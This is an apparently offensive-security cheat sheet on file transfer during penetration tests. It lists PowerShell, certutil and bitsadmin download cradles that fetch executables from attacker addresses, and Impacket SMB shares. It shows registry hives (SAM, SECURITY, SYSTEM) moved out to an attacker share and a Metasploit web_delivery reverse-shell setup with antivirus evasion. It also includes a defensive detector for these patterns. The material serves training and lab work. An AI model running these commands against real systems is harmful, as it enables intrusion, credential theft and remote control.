# Uploading Shells / Transferring Files

{% embed url="https://juggernaut-sec.com/windows-file-transfers-for-hackers/" %}
Windows file-transfer cheat sheet
{% endembed %}

### Transfer files with SSH (SCP)

Copying into `/tmp` is usually the safest choice: it is world-writable, so the upload rarely fails on permissions.

```shell
# upload a local file into the remote host's /tmp
scp /opt/LinEnum.sh pingu@10.10.10.10:/tmp
```

```shell
# download a remote file into the local working directory as notes.txt
scp ubuntu@192.168.1.30:/home/ubuntu/documents.txt notes.txt
```

### Python server

```shell
# serves the current directory over HTTP on port 8000, on all interfaces
python3 -m http.server
```
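As an added example (not code from the original page), the same `http.server` module that `python3 -m http.server` wraps, used directly so the staging server serves one fixed directory and records each request with the client address and User-Agent, which tells you which tool on the far side pulled the file. The names `StagingHandler`, `make_server`, `start_server` and `fetch` are my own.

```python
# Added example, not from the original page: http.server used programmatically
# as a small staging server with a request log. All names here are my own.
import functools
import http.server
import threading
import urllib.request
from pathlib import Path


class StagingHandler(http.server.SimpleHTTPRequestHandler):
    """Serve files from one directory and keep a record of every request."""

    # Class-level list shared by all handler instances: one dict per request.
    requests = []

    def log_message(self, fmt, *args):
        # The base class calls this once per request (and on errors, before the
        # headers exist), so guard the header lookup. Recording the User-Agent
        # shows which client fetched the file (curl, wget, BITS, WebClient, ...).
        headers = getattr(self, "headers", None)
        entry = {
            "client": self.client_address[0],
            "request": fmt % args,
            "user_agent": headers.get("User-Agent", "-") if headers else "-",
        }
        StagingHandler.requests.append(entry)
        print(f"{entry['client']} {entry['request']} UA={entry['user_agent']}")


def make_server(directory, bind="0.0.0.0", port=8000):
    """Build a threaded HTTP server rooted at `directory`; SimpleHTTPRequestHandler
    resolves request paths relative to it and strips '..' components."""
    handler = functools.partial(StagingHandler, directory=str(directory))
    return http.server.ThreadingHTTPServer((bind, port), handler)


def start_server(directory, bind="127.0.0.1", port=0):
    """Serve `directory` in a background thread. port=0 lets the OS pick a free
    port; read it back from the returned server's .server_address."""
    httpd = make_server(directory, bind, port)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


def fetch(host, port, name):
    """Client side: download /name from the server and return the body bytes."""
    with urllib.request.urlopen(f"http://{host}:{port}/{name}", timeout=5) as resp:
        return resp.read()


if __name__ == "__main__":
    # Equivalent to `python3 -m http.server 8000` in the current directory,
    # plus the request log above.
    srv = make_server(Path.cwd())
    print("serving", Path.cwd(), "on", srv.server_address)
    srv.serve_forever()
```

Run it from the directory holding the files to stage; each fetch prints a line such as `10.10.10.5 "GET /LinEnum.sh HTTP/1.1" 200 46631 UA=curl/8.5.0`, which is also a quick way to confirm that a download command on the other host actually reached you.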

### Basic http-server (Node.js)

```shell
# the npm "http-server" package; serves the current directory on port 8080
http-server -p 8080
```

### PowerShell downloading files

```powershell
# From a PowerShell prompt:
(New-Object System.Net.WebClient).DownloadFile('http://10.9.88.34:8000/SharpHound.ps1', 'C:\Users\Administrator\Downloads\SharpHound.ps1')

# From a cmd prompt, invoking PowerShell inline:
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.30:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FooXh4gLIp3QDO0NWdnwc%2Fimage.png?alt=media&#x26;token=5afd8c5a-de1b-42cd-a1f6-dd56d3c5b985" alt=""><figcaption></figcaption></figure>

### certutil (Windows cmd)

`-f` forces a fresh fetch instead of reusing the URL cache; the last argument is the output file name.

```
certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe
```

### RDP with a shared folder to transfer files (xfreerdp)

`/drive:Home,/home/kali/Downloads` exposes the local directory inside the session as a redirected drive named `Home`, reachable from the remote host as `\\tsclient\Home`.

```shell
xfreerdp /u:bob /p:HTB_@cademy_stdnt! /v:10.129.202.99 +clipboard /drive:Home,/home/kali/Downloads
```

### bitsadmin: download files from a server to a Windows machine

Arguments are job name, source URL and destination; the destination must be an absolute path.

```
bitsadmin /transfer myDownloadJob http://192.168.18.144:8000/ammar.txt E:\Study\CEH\ammar.txt
```

### SMB file transfer with Impacket

Start an SMB server on the attacking machine. This shares `~/Downloads` under the share name `desktop`, enables SMB2 (SMB1 is disabled by default on current Windows) and requires the credentials `test`/`test`:

```
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-smbserver desktop ~/Downloads -smb2support -username test -password test
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

It can also be run without a username and password (anonymous access), here sharing `/home/ltnbob/Documents` as `CompData`. Recent Windows builds disable insecure guest logons by default, so the credentialed form is the more reliable one:

```
ammartiger@htb[/htb]$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

On the Windows host, map the share as a drive letter:

```
controller\administrator@DOMAIN-CONTROLL C:\>net use z: \\10.9.88.34\desktop /user:test test
The command completed successfully.
```

Files can then be copied in both directions through the mapped drive:

```
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator\Downloads>copy SharpHound.ps1 z: 
        1 file(s) copied. 
```

Files can also be moved straight to the UNC path without mapping a drive:

```
C:\> move sam.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move security.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move system.save \\10.10.15.16\CompData
        1 file(s) moved.
```

### Evil-WinRM

Evil-WinRM's built-in `upload` and `download` commands transfer files over the existing WinRM session:

```
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20230730011352_BloodHound.zip

Info: Downloading C:\Users\svc-alfresco\Documents\20230730011352_BloodHound.zip to 20230730011352_BloodHound.zip

Info: Download successful!
```

### Other one-liner web servers (complete list)

{% embed url="https://gist.github.com/willurd/5720255" %}

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FKaiZVRdBwr4xeO6fSQJB%2Fimage.png?alt=media&#x26;token=e5427e04-f854-40b2-b3bc-d326506d7c29" alt=""><figcaption></figcaption></figure>

### Getting a Meterpreter shell on a compromised Windows machine

```
msf6 > use exploit/multi/script/web_delivery
msf6 exploit(multi/script/web_delivery) >
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FGLXOJ0r6db9sREpUr0UB%2Fimage.png?alt=media&#x26;token=97afa936-c8a0-4ad9-a207-99112ccac931" alt=""><figcaption></figcaption></figure>

* `exploit/`: Indicates the use of a module designed to take advantage of a specific vulnerability or system configuration to execute code.
* `multi/`: Signifies that the module is cross-platform and can target multiple operating systems (Windows, Linux, macOS).
* `script/`: Specifies that the exploit delivers its payload via a script (like PowerShell, Python, or PHP).
* `web_delivery`: The name of the module that hosts a payload on a temporary web server. When the victim executes a specific one-liner command, it fetches and runs the payload in memory.

***

#### Utility: PowerShell & Windows Reverse Meterpreter

The primary utility of this module is to gain a fileless reverse shell. Instead of sending an `.exe` file that might be caught by antivirus, you provide a single PowerShell command to the target system.

**1. Usage for Windows Reverse Meterpreter**

To use this for a Windows target, you would configure the module within Metasploit as follows:

* Set Target: `set TARGET 2` (this selects the PowerShell target; the screenshot above shows `target => 2`).
* Set Payload: `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
* Set Local Host: `set LHOST [Your_IP]`
* Execute: Type `run` or `exploit`.

**2. Full Use with PowerShell**

Once you type `run`, Metasploit generates a unique PowerShell one-liner along these lines: `powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -RunAs [Encoded_Command_String]`

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FD4xSsrhKpWXEFvmAOadT%2Fimage.png?alt=media&#x26;token=5e5c8d90-f2d5-4f27-ba48-951e5f696a27" alt=""><figcaption></figcaption></figure>

**Why this is effective:**

* Antivirus Evasion: because the payload runs in memory via PowerShell, no payload file is written to disk, which defeats file-based antivirus scanning. It is not invisible, though: the one-liner itself appears in process-creation telemetry (Sysmon Event ID 1, Security Event ID 4688), PowerShell Script Block Logging records the decoded script (Event ID 4104), and AMSI inspects it before it executes.
* Simplicity: You only need a way to execute a single line of text on the victim's machine (e.g., via a compromised web server, a malicious shortcut, or a macro).
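For the defensive counterpart to both the transfer commands listed on this page and the web_delivery one-liner described above, here is an added example (not from the original page) that scans process-creation command lines for the download primitives shown earlier (`certutil -urlcache`, `bitsadmin /transfer`, `WebClient.DownloadFile`) and for encoded, hidden-window PowerShell launches, decoding `-EncodedCommand` payloads so the cradle inside is checked too. The rule names, the `analyze`/`scan` functions and the sample events are my own constructions.

```python
# Added example, not from the original page: a defender-side scan of
# process-creation command lines (e.g. Sysmon Event ID 1 / Security 4688
# exports) for the file-transfer primitives this page lists. Rule names,
# helper functions and the sample events are constructed for illustration.
import base64
import re

# (rule name, pattern matched against the full command line, case-insensitively)
RULES = [
    ("certutil_urlcache",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*https?://", re.I)),
    ("bitsadmin_transfer",
     re.compile(r"bitsadmin(\.exe)?\s+/transfer\b.*https?://", re.I)),
    ("powershell_webclient",
     re.compile(r"net\.webclient|downloadfile\(|downloadstring\(", re.I)),
    ("powershell_encoded",
     re.compile(r"powershell(\.exe)?\s.*(-e|-enc|-encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("powershell_hidden_or_bypass",
     re.compile(r"powershell(\.exe)?\s.*(-w(indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass)", re.I)),
]

ENCODED_RE = re.compile(r"(?:-e|-enc|-encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def encode_command(script):
    """PowerShell's -EncodedCommand format: base64 of the UTF-16LE script.
    Used here only to build a realistic sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Return (matched rule names, decoded script or None) for one command line.
    The decoded script is scanned as well, so an encoded cradle is not missed."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        hits += [name for name, rx in RULES if name not in hits and rx.search(decoded)]
    return hits, decoded


def scan(events):
    """Map each suspicious command line to its rule hits; benign lines are dropped."""
    findings = {}
    for line in events:
        hits, _ = analyze(line)
        if hits:
            findings[line] = hits
    return findings


# Constructed sample events in the shape of the commands on this page; the
# encoded one wraps the page's own DownloadFile call.
WEBCLIENT_SCRIPT = ("(New-Object System.Net.WebClient).DownloadFile("
                    "'http://10.10.14.30:9005/40564.exe', 'c:\\Users\\Public\\Downloads\\40564.exe')")
SAMPLE_EVENTS = [
    r"C:\Windows\System32\notepad.exe C:\Users\bob\notes.txt",
    "certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe",
    r"bitsadmin /transfer myDownloadJob http://192.168.18.144:8000/ammar.txt E:\Study\CEH\ammar.txt",
    'powershell -c "' + WEBCLIENT_SCRIPT + '"',
    "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand "
    + encode_command(WEBCLIENT_SCRIPT),
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_EVENTS).items():
        print(", ".join(hits), "<-", line[:80])
```

The patterns are deliberately narrow (a URL must follow `-urlcache` or `/transfer`) to keep false positives from ordinary certificate and BITS maintenance low; the `-EncodedCommand` decode step matters most, because the raw command line of an encoded launch contains none of the WebClient keywords.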
